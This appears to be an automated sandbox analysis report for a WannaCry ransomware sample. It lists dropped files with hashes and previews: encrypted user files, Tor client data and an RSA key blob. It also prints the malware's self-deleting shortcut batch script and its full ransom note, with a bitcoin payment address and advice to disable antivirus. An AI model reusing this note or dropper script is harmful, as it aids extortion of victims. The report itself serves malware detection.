                                                  Preview:WANACRY!....*....x.....rXs..}......eqob.]...<.>W..~...<.|..4.K.?.o..(..L....{....k..b.iHce.../.b.....%.*.@i..."<).5`..F.}J+wz..-</..9......x.]c....I7.G....*...?.=.t...J.2..g.<<....7i:c.q..vR.((...6]X.I....a2!n...)..*).'T.)...;;e...Vgt..|%.[u|1#.ZT../....C.. .............$-3.N.C.E..Ir.2U-.{Re.yX...g.1..R......7........D......f.0....&._.[..C ....Ex..<...v"....#(...q........g1..2..G.`..&..p..`.q..tsHxi.6._..G..b*...d..'.9,.{.....c...T..l.Y..Oy.(]Tm.&:...>...dlGJ.a......:.D..R#...$I.?;_y.aCxQ..wW"n_.>.,...A....0MH..:A.!.....k...#%..JL...Jt.O\.|J`8.......C.u.....f#.]...'...b4$*..Fp,h..g.^WU*...7..."..[.x..5or..?.8.?..P#....+H...DQ..}..1.t...:.b.#p....?......j.I..PU........DR'......>.........F...K..9.$N..0Q....le`.:...8.7..&..Ia.T.f]FS.....i..+S.!...*z.PY....UaM@U.].({.R..(.-gJf...v.y..>5-.A.;jr.....$|...6.3!.c..R`..*r...?}7. ..=...x......'.TR..FJ..|...9..\Y.,[.f..\.:.7...a.....(JC...3.<W.8..9..n.....W....@^.A..#C.FL..L..$...6h.....X*5.!.7.y{.=G....../q....g

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):792
                                                  Entropy (8bit):7.69044397682822
                                                  Encrypted:false
                                                  SSDEEP:24:bkKD3d2xdb/Os+NqRiLR8Bk41JbgtvGTaq6WDRrM:bkKDNoOs+qRzWwyvGTaWDRQ
                                                  MD5:66965AF229E07BA3BF455F9F917EE6FC
                                                  SHA1:563819B3AFC120A3580020AE3B7C43125BE7F8B3
                                                  SHA-256:356A6C14B5A68D5DFE637718690135FC5A81314B6325B0EE083F940A56D833DE
                                                  SHA-512:25D39F8793D3B368B7A2F6BCE1320614B4974F6CB04CE94F8C79EA65D6A883246FF85A0F7332A8977899F4DAFD424ECAC888FCF8597B07A776E329EA0B58A39B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....._.V..Cd.N?.-.^.h...#.....qq`.....w....V.......P...._.r.+.F.G}. .......6.].h.._....".t.^~b7...zk....u9T....0:.+..qyd...";.../.`.?..W...!.....M$....d.....?...........<k...CED.....#nM.ry.P..,....nE....%..e.(.....=!.c.f..y.ofS..... h......\q<.o..!..._............b.*...T.q~..5...mO..Dd..5z.|........='....]......6...&......ca...-...99@2.!...FC....A@e.........+.[.}.h{.q3Z....VP.%.,Ec^.._../.%z...<D..8.B`?/8Y.O....U4.5..YM.....4<..\....uA...d.]+...*E.I.L...O...G. E..d.B........#.._.N.H.+{_..P....~..._...[....~..E.#.....4FS..~..:..{.:.&_..L..#..9.@...g....120C^b...6.....?..f.P.2.<..j6L....{....s...c...".TC...^L.H.:_.is....,......5...{~.T.?X.~a1%wH..'l.C.4..C..?.d~B..@.l.w.N..:.......zd.J...\Re..* c.`~.e....}5...M.x.k.+..eR..a..`.>oV.gO.,.a.l.>....]

                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):12216
                                                  Entropy (8bit):7.983756714992244
                                                  Encrypted:false
                                                  SSDEEP:192:mwzRSTFGH8Lkw1O8dmxSWih1BeGZFNjvaJPUuJ3xMyIYSfCDORiodjA3CLg+b:mwzRACOr1O5xSLBVZH+LlOyIlfCDOo2p
                                                  MD5:B758B7D0A1C9558F551B9CB356B5DCE3
                                                  SHA1:9F2E9F380768779E965C2B8B2822B6FA85239041
                                                  SHA-256:EA6AF0E64A2F734B6253B00F5BB881D8C4E09CB015A4AF035EDCF74A4476C683
                                                  SHA-512:18AF1334F4DC43F7B427312C44002BB1EDB04C6A6AF4D7E0771AAC5E2BBA39F7847E608084F348F8E6691B00D36DCF86252981F976BC685A44686BA75147D890
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....5!..y[.........x..R.. }9H..9.|.A...Z...I.C.H...nB..&.....|.?.JQ.Ri.3`S.R....).....M_..@....(..}.9'.PAu....b....D........./.....V.;.ZVB....|k..t...o...9..%..,o..4.><..#]^ETk..$.s..iiX.........h.KL......SL....Pl.^.}w.h.....j...U.Kx...6zP.t.c-............D..N..~.|.........Y...N.;@z.4....'...kL5...xr~..9/.G .l.2.E....i..X.Ak}h.,........8........6~vN...F.~....4*..i......R!n.q..?..,.........w..^..l....O...F3._..?Iq*\v.F...C......C...Q..fg...~.........|}....@.*.`.8 OV......_.../^....[LE...5....g...l..el.."...rf..Pb]T0P...50.q{i.T.K4./....!S.).$.....S+.)A4......+g$7....u^.....m3.<..*..t'.3`9.J..... Z<._..r.....|}Yef.H.vK...bcK..3&.b..gS\...N......\C..,..o.#....z.o.....8S....V.Z.b..%...*..V..S+....+...d4.....FZy(r..K.....x..h...R..<!..2.5.....C...,...q.........-.t...|.C.@X.....DI~.,.LI...0..an.m.ZZc.`.......;.K.Ty!._.J.A.h.m.\A....@h..s...SF.0K.H..d7xT.[...u....t...............z.8...>.^.C5.i%..q:.,. ...@r..).(.k...E..QN..

                                                  C:\Users\user\AppData\Roaming\tor\cached-certs (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):18574
                                                  Entropy (8bit):6.053176809709424
                                                  Encrypted:false
                                                  SSDEEP:384:yMY4YVvR1hqQos2h4YVc1h1nd4oGbVla1hQfyyd24ZFtVf1hc1x//4DVEl1hnb52:wJL+QJ6xyhd1ImOy62M1uxnyKDb+3jnF
                                                  MD5:2DEB894B10A61E5B56DB1A378403B4FF
                                                  SHA1:1183DFE1ACF498747681B9C94BE72E182A32A273
                                                  SHA-256:ED80D2981DA19865B7D7FBD24BF5CEF3A20B01BD3C9CBBB9812F81B0EAE36768
                                                  SHA-512:21A42399FE0FC36C18F0339BEA7FA0A0C0024C4CFF76E48DBCEAE63F07698037CE74A466B3612079CAFE3E2CEB889856DF52B6D159C8512B1AFF9B29EC5AA15F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2022-06-14 11:48:34..dir-key-expires 2023-06-14 11:48:34..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA7LzrnjFMMIdR5jsYtXFJHnunnnPA5+gROwBG3QyQKZMKHcJDi/Sx..E71eLa5wutJjDwxT1HSyuPex7/74h0IEj06DUYiMm7YU+wbLDNflgF2PbVrNtVYx..IaOPlZDnugBbis9/No5yHypzLeKv

                                                  C:\Users\user\AppData\Roaming\tor\cached-certs.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):18574
                                                  Entropy (8bit):6.053176809709424
                                                  Encrypted:false
                                                  SSDEEP:384:yMY4YVvR1hqQos2h4YVc1h1nd4oGbVla1hQfyyd24ZFtVf1hc1x//4DVEl1hnb52:wJL+QJ6xyhd1ImOy62M1uxnyKDb+3jnF
                                                  MD5:2DEB894B10A61E5B56DB1A378403B4FF
                                                  SHA1:1183DFE1ACF498747681B9C94BE72E182A32A273
                                                  SHA-256:ED80D2981DA19865B7D7FBD24BF5CEF3A20B01BD3C9CBBB9812F81B0EAE36768
                                                  SHA-512:21A42399FE0FC36C18F0339BEA7FA0A0C0024C4CFF76E48DBCEAE63F07698037CE74A466B3612079CAFE3E2CEB889856DF52B6D159C8512B1AFF9B29EC5AA15F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2022-06-14 11:48:34..dir-key-expires 2023-06-14 11:48:34..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA7LzrnjFMMIdR5jsYtXFJHnunnnPA5+gROwBG3QyQKZMKHcJDi/Sx..E71eLa5wutJjDwxT1HSyuPex7/74h0IEj06DUYiMm7YU+wbLDNflgF2PbVrNtVYx..IaOPlZDnugBbis9/No5yHypzLeKv

                                                  C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2467187
                                                  Entropy (8bit):5.658388256115609
                                                  Encrypted:false
                                                  SSDEEP:24576:Dft4yKt8kAO9vC14oin83GO7HGxPdBTMQ/:DfmVXn8WL/
                                                  MD5:28C57845536B4188DE4B6727C3DD246F
                                                  SHA1:4A30A12A785B69E26D1147FA63ECA6AB03981F98
                                                  SHA-256:46853E5FE4697CBF72B97895358DCA4272D31834E2AAAAA2C44690A3A4E4A2D4
                                                  SHA-512:AFC1016BAE2CB7AB81F1A152BFE7B4C10609B3A378060AE28DB7DE4CB0CCF12557AF345DF7596CB16AA6A770AAAB7B5A48807054958C335D536A21D622F30005
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-05-15 07:00:00..fresh-until 2023-05-15 08:00:00..valid-until 2023-05-15 10:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConne

                                                  C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2467187
                                                  Entropy (8bit):5.658388256115609
                                                  Encrypted:false
                                                  SSDEEP:24576:Dft4yKt8kAO9vC14oin83GO7HGxPdBTMQ/:DfmVXn8WL/
                                                  MD5:28C57845536B4188DE4B6727C3DD246F
                                                  SHA1:4A30A12A785B69E26D1147FA63ECA6AB03981F98
                                                  SHA-256:46853E5FE4697CBF72B97895358DCA4272D31834E2AAAAA2C44690A3A4E4A2D4
                                                  SHA-512:AFC1016BAE2CB7AB81F1A152BFE7B4C10609B3A378060AE28DB7DE4CB0CCF12557AF345DF7596CB16AA6A770AAAB7B5A48807054958C335D536A21D622F30005
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-05-15 07:00:00..fresh-until 2023-05-15 08:00:00..valid-until 2023-05-15 10:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConne

                                                  C:\Users\user\AppData\Roaming\tor\state (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):384
                                                  Entropy (8bit):5.160817353994291
                                                  Encrypted:false
                                                  SSDEEP:6:SbdWwxXK5kxnXr87+QVe2vwR/EnR58EEQLsT0+EEQiUEFjuWWURbibfl8wE:bwxXK5kxXr87HVBvwNu5TEQG0dEQipj9
                                                  MD5:D1F28CDB1378AAFDA9588E24D7938DB7
                                                  SHA1:3107C8D4DE712A793055751372B292E5381BCED7
                                                  SHA-256:E6FC7A7D16EEABA3114421553E819E2C55C2D8D8DDD64F78B5A2E440CBC1333A
                                                  SHA-512:50C73AE1E71759547952F21DB9369A296274D8F8A6305CBB21A27D742C486D446E97045262EED160E5F7C27282C53624F8E08500F81830596AC6C7ADFC21C26A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:# Tor state file last generated on 2023-05-15 09:31:52 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard despacitor E00DFD54DC165D5452FBD3530D30186DAD016A0C DirCache..EntryGuardAddedBy E00DFD54DC165D5452FBD3530D30186DAD016A0C 0.2.9.10 2023-04-28 12:51:33..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-05-15 08:31:52..

                                                  C:\Users\user\AppData\Roaming\tor\state.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):384
                                                  Entropy (8bit):5.160817353994291
                                                  Encrypted:false
                                                  SSDEEP:6:SbdWwxXK5kxnXr87+QVe2vwR/EnR58EEQLsT0+EEQiUEFjuWWURbibfl8wE:bwxXK5kxXr87HVBvwNu5TEQG0dEQipj9
                                                  MD5:D1F28CDB1378AAFDA9588E24D7938DB7
                                                  SHA1:3107C8D4DE712A793055751372B292E5381BCED7
                                                  SHA-256:E6FC7A7D16EEABA3114421553E819E2C55C2D8D8DDD64F78B5A2E440CBC1333A
                                                  SHA-512:50C73AE1E71759547952F21DB9369A296274D8F8A6305CBB21A27D742C486D446E97045262EED160E5F7C27282C53624F8E08500F81830596AC6C7ADFC21C26A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:# Tor state file last generated on 2023-05-15 09:31:52 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard despacitor E00DFD54DC165D5452FBD3530D30186DAD016A0C DirCache..EntryGuardAddedBy E00DFD54DC165D5452FBD3530D30186DAD016A0C 0.2.9.10 2023-04-28 12:51:33..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-05-15 08:31:52..

                                                  C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2467187
                                                  Entropy (8bit):5.658388256115609
                                                  Encrypted:false
                                                  SSDEEP:24576:Dft4yKt8kAO9vC14oin83GO7HGxPdBTMQ/:DfmVXn8WL/
                                                  MD5:28C57845536B4188DE4B6727C3DD246F
                                                  SHA1:4A30A12A785B69E26D1147FA63ECA6AB03981F98
                                                  SHA-256:46853E5FE4697CBF72B97895358DCA4272D31834E2AAAAA2C44690A3A4E4A2D4
                                                  SHA-512:AFC1016BAE2CB7AB81F1A152BFE7B4C10609B3A378060AE28DB7DE4CB0CCF12557AF345DF7596CB16AA6A770AAAB7B5A48807054958C335D536A21D622F30005
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-05-15 07:00:00..fresh-until 2023-05-15 08:00:00..valid-until 2023-05-15 10:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConne

                                                  C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2467187
                                                  Entropy (8bit):5.658388256115609
                                                  Encrypted:false
                                                  SSDEEP:24576:Dft4yKt8kAO9vC14oin83GO7HGxPdBTMQ/:DfmVXn8WL/
                                                  MD5:28C57845536B4188DE4B6727C3DD246F
                                                  SHA1:4A30A12A785B69E26D1147FA63ECA6AB03981F98
                                                  SHA-256:46853E5FE4697CBF72B97895358DCA4272D31834E2AAAAA2C44690A3A4E4A2D4
                                                  SHA-512:AFC1016BAE2CB7AB81F1A152BFE7B4C10609B3A378060AE28DB7DE4CB0CCF12557AF345DF7596CB16AA6A770AAAB7B5A48807054958C335D536A21D622F30005
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-05-15 07:00:00..fresh-until 2023-05-15 08:00:00..valid-until 2023-05-15 10:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConne

                                                  C:\Users\user\Desktop\00000000.pky

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:b.out overlay pure segmented standalone executable V2.3 V3.0 86 Large Text
                                                  Category:dropped
                                                  Size (bytes):276
                                                  Entropy (8bit):7.119495279154256
                                                  Encrypted:false
                                                  SSDEEP:6:mtNBgyzT3WqUGXYABbq1PBhu7KkuDknhXE2VR8/GCA3wy8qJd9:YrT3PBbqzZseYR8/pAgy8qJ
                                                  MD5:C772D05EACC3291EF8428892CE7DBD8C
                                                  SHA1:C9C4468566F30B4682BEF64E662FB161309B7E61
                                                  SHA-256:6E9DAE07E926EA6EF391E85B1798F5CF932F9244620167A62EC9F3B01EC32B39
                                                  SHA-512:D0B382ABDB296296C4BE1EC89F0A1A4012EABD3DBE38022627C0F0D303191D7B7C3DD1E6BFBAADFD31B1846219D52DAED4DF80C8B9185C2F0C301DE22767CE13
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:........RSA1.........UqhY.l].....).....Q.Wh8d<..U,.....A...s.....tl....b8a$..)..b.2....c.3u.4............?.....4.(...C.....t.C(..7...7.O.Tk.M]...\.....k...9b............N.....>+.Ad.?..I....[B..x.....+..-....[..S.....8...*..7.""L..2,...Y..$......z....}za.y........

                                                  C:\Users\user\Desktop\00000000.res

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):136
                                                  Entropy (8bit):1.5032029626324017
                                                  Encrypted:false
                                                  SSDEEP:3:42Iqtcl/5Ysl7LOgtl:7IxlnLll
                                                  MD5:5051D987962C43EE725D46F24E7B05A3
                                                  SHA1:EED7D4D30641C96CC0EA7174E7164D8755AD8766
                                                  SHA-256:CCFA0AB527F6588CFEE811E1C1A440C79B6B506B34C24744A73502730B062CC4
                                                  SHA-512:4D1531F5AFB17630D219D97F0DAD73EC70E0A968A564DBC821FE54B83A7D9BB00C20D98895BB2A869E40957AC8CDEE75846CFACC84F534C96791810215AEA111
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview::.).5Sm.........................................................................................M.ad..................ad..ad}...^.+.....

                                                  C:\Users\user\Desktop\198851684139341.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                                  Category:dropped
                                                  Size (bytes):320
                                                  Entropy (8bit):5.087022538559631
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDfewSiponv6xewImKFcsDONy+WlynJ96wYexi+XCrbPONy+WlynJfF06xiHYM:hqn4+B9TnRoJgpPnRoJ0F9a2T2ZLT2Ln
                                                  MD5:09AAE1ABF5568DD1F940137DD8DAF634
                                                  SHA1:857AFA678E47B47033502409FF9F1ED630B2DB72
                                                  SHA-256:0520935E7778057E45B297E4B934EE3CE3DB1051B67BE1DD9015BACB5B36CD15
                                                  SHA-512:6BFE594D04349B567375B027D8468D8059428E1BD03C80A0006522ECA998D34597ECD62A6462C2668A9C38C11A3B663C781DC385E6AF5F32A7E6152317E82453
                                                  Malicious:false
                                                  Yara Hits:
                                                  • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\198851684139341.bat, Author: Florian Roth (Nextron Systems)
                                                  Reputation:unknown
                                                  Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..

                                                  C:\Users\user\Desktop\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Desktop\@WanaDecryptor@.bmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
